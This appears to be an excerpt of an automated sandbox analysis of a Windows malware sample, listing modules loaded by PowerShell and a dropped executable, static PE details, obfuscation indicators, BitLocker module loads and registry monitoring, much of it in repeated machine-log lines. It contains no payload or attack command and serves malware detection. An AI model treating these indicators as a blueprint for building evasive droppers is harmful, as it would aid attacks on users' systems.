Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: apphelp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: sspicli.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: wininet.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: rstrtmgr.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: ncrypt.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: ntasn1.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: dbghelp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: iertutil.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: windows.storage.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: wldp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: profapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: kernel.appcore.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: winhttp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: mswsock.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: iphlpapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: winnsi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: urlmon.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: srvcli.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: netutils.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: dnsapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: rasadhlp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: fwpuclnt.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: schannel.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: mskeyprotect.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: msasn1.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: dpapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: cryptsp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: rsaenh.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: cryptbase.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: gpapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: ncryptsslp.dll

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: YYjRtxS70h.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: YYjRtxS70h.exe

Static file information: File size 13793970 > 1048576

Source: YYjRtxS70h.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: YYjRtxS70h.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Users\danie\source\repos\Qwest\Qwest\obj\Debug\Qwest.pdb source: YYjRtxS70h.exe

Binary contains a suspicious time stamp

Source: YYjRtxS70h.exe

Static PE information: 0x833F0DF3 [Tue Oct 11 12:07:15 2039 UTC]

PE file contains sections with non-standard names

Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr

Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_04BE633D push eax; ret	10_2_04BE6351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_04BE2CFF push 04B807BAh; retf	10_2_04BE2CFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_04BE2C5C push 04B807BAh; retf	10_2_04BE2CFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04B63A9B push ebx; retf	13_2_04B63ADA

Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr

Static PE information: section name: .text entropy: 6.864188260151341

Drops PE files

Source: C:\Users\user\Desktop\YYjRtxS70h.exe

File created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
